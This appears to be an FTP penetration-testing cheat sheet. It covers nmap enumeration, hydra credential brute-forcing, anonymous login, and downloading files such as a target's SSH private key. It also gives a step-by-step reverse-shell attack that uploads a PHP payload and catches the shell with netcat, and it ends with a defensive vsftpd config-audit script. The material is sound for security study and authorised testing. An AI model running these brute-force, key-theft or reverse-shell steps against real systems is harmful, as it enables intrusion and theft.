# FTP (File Transfer Protocol) Pentesting

FTP is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network. Default ports are 20 (for data), 21 (for control).

### Enumeration <a href="#enumeration" id="enumeration"></a>

```shellscript
nmap --script ftp-anon -p 21 <target-ip>
# Quote the wildcard so the shell does not expand it before nmap sees it
nmap --script "ftp-vuln*" -p 21 <target-ip>
nmap --script "ftp-*" -p 21 <target-ip>
```

#### Brute Force Credentials <a href="#brute-force-credentials" id="brute-force-credentials"></a>

```shellscript
hydra -l username -P passwords.txt <target-ip> ftp
hydra -L usernames.txt -p password <target-ip> ftp

hydra -l username -P passwords.txt ftp://<target-ip>
hydra -L usernames.txt -p password ftp://<target-ip>
```

### Investigation <a href="#investigation" id="investigation"></a>

#### Banner Grabbing <a href="#banner-grabbing" id="banner-grabbing"></a>

```shellscript
nc <target-ip> 21
```

#### Using OpenSSL <a href="#using-openssl" id="using-openssl"></a>

First, connect to the FTP control port with netcat.

```shellscript
nc -vn <target-ip> 21
```

Then run the command below to negotiate TLS over the same port with STARTTLS.

```shellscript
openssl s_client -connect <target-ip>:21 -starttls ftp
```

#### Configuration Files <a href="#configuration-files" id="configuration-files"></a>

```shellscript
cat /etc/vsftpd.conf
cat /etc/vsftpd/vsftpd.conf
```

### Connect <a href="#connect" id="connect"></a>

#### Using `ftp` <a href="#using-ftp" id="using-ftp"></a>

```shellscript
ftp <target-ip>
ftp <target-ip> <target-port>
```

Sometimes we might be able to log in as **anonymous**.\
Not likely, but worth a try.

```shellscript
ftp <target-ip>
username: anonymous
password: anonymous
```

#### Using `lftp` <a href="#using-lftp" id="using-lftp"></a>

`lftp` is an enhanced version of `ftp`. It is easier to use than `ftp`.

```shellscript
lftp
lftp :~> connect 10.0.0.1
# or
lftp 10.0.0.1

# Login with username and password
lftp 10.0.0.1:~> login username password
```

### Commands in FTP <a href="#commands-in-ftp" id="commands-in-ftp"></a>

After connecting to FTP, we can browse directories and files, download them to the local machine, and upload local files to the target system.\
The FTP commands are almost the same as Linux commands.

```shellscript
ftp> pwd
ftp> cd
ftp> ls
# Print the content of the file
ftp> get example.txt -

# Switch to passive mode.
ftp> passive

# Print usage
ftp> ?
```

#### Download Files <a href="#download-files" id="download-files"></a>

To download files to the local machine:

```shellscript
ftp> get example.txt
ftp> get home/user/.ssh/id_rsa ./id_rsa

# recursive
wget -r --user='username' --password='password' ftp://<target-ip>/sample
```

#### Upload Files <a href="#upload-files" id="upload-files"></a>

```shellscript
ftp> put example.txt
```

### Reverse Shell over Website <a href="#reverse-shell-over-website" id="reverse-shell-over-website"></a>

If the target website allows users to access the FTP directory, we can upload a reverse shell payload and get a shell.

1. **Download the Payload**

   Get the payload for the reverse shell from [this repository](https://github.com/pentestmonkey/php-reverse-shell).

   ```shellscript
   wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

   # --------------------------------------------------------------------------------

   # Edit some variables in shell.php
   $ip = '<your-local-ip>';
   $port = 1234;
   ```
2. **Upload the Payload to FTP Directory**

   Connect to FTP and upload the payload.

   ```shellscript
   ftp <target-ip>

   # Upload the payload you downloaded
   ftp> put shell.php
   ```
3. **Get a Shell**

   First, we need to open a listener on the local machine.

   ```shellscript
   nc -lvnp 1234
   ```

   In a web browser, access "http://vulnerable.com/path/to/ftp/shell.php".\
   We should get a target shell.

### Start FTP Server <a href="#start-ftp-server" id="start-ftp-server"></a>

#### 1. Install vsftpd <a href="#id-1-install-vsftpd" id="id-1-install-vsftpd"></a>

```shellscript
sudo apt install vsftpd
```

To check the config file for vsftpd, run the following command.

```shellscript
less /etc/vsftpd.conf
```
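
When reviewing that file on a server you run, the settings that matter most for the techniques on this page are the ones controlling anonymous login, anonymous upload, chroot confinement and TLS. The script below is an added example, not part of the original page: the function names `conf_bool` and `audit_vsftpd_conf` and the sample config are constructed for illustration, and it assumes a later line overrides an earlier one for the same directive.

```bash
#!/usr/bin/env bash
# Added example (not from the original page): flag risky vsftpd.conf settings.

# Effective value of a boolean directive. The last uncommented "name=value"
# line is used (assumption: later lines override earlier ones); if the
# directive is absent, fall back to the default given in vsftpd.conf(5).
conf_bool() {  # usage: conf_bool <file> <directive> <default>
  local val
  val=$(sed -n "s/^$2=//p" "$1" | tail -n 1 | tr -d '[:space:]' | tr '[:lower:]' '[:upper:]')
  case "${val:-$3}" in
    YES|TRUE|1) echo YES ;;
    *)          echo NO ;;
  esac
}

# Print one finding per line. Returns 1 if anything was flagged, 0 if clean,
# 2 if the file cannot be read.
audit_vsftpd_conf() {  # usage: audit_vsftpd_conf <path-to-vsftpd.conf>
  local f="$1" rc=0 anon write anon_up local_en chroot ssl
  [ -r "$f" ] || { echo "cannot read $f" >&2; return 2; }
  anon=$(conf_bool "$f" anonymous_enable YES)
  write=$(conf_bool "$f" write_enable NO)
  anon_up=$(conf_bool "$f" anon_upload_enable NO)
  local_en=$(conf_bool "$f" local_enable NO)
  chroot=$(conf_bool "$f" chroot_local_user NO)
  ssl=$(conf_bool "$f" ssl_enable NO)

  if [ "$anon" = YES ]; then
    echo "anonymous_enable: anonymous login is accepted"; rc=1
    # anon_upload_enable only takes effect when write_enable is also on
    if [ "$write" = YES ] && [ "$anon_up" = YES ]; then
      echo "anon_upload_enable: anonymous users can upload files"; rc=1
    fi
  fi
  if [ "$local_en" = YES ] && [ "$chroot" = NO ]; then
    echo "chroot_local_user: local users are not confined to their home directory"; rc=1
  fi
  if [ "$ssl" = NO ]; then
    echo "ssl_enable: logins and transfers are sent in cleartext"; rc=1
  fi
  return "$rc"
}

# Constructed sample config, written to a temp file so the script runs offline.
sample=$(mktemp)
printf '%s\n' '# constructed sample' 'anonymous_enable=YES' 'write_enable=YES' \
  'anon_upload_enable=YES' 'local_enable=YES' '#ssl_enable=YES' > "$sample"
audit_vsftpd_conf "$sample" || true
rm -f "$sample"
```

Point it at `/etc/vsftpd.conf` (or `/etc/vsftpd/vsftpd.conf`) and treat a non-zero exit status as a prompt to review the flagged directives.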

#### 2. Start FTP Server <a href="#id-2-start-ftp-server" id="id-2-start-ftp-server"></a>

Below are the commands for starting the FTP server and checking its status.

```shellscript
sudo systemctl start vsftpd
sudo systemctl status vsftpd
```

If you’ve updated the config file, you need to restart vsftpd.

```shellscript
sudo systemctl restart vsftpd
```
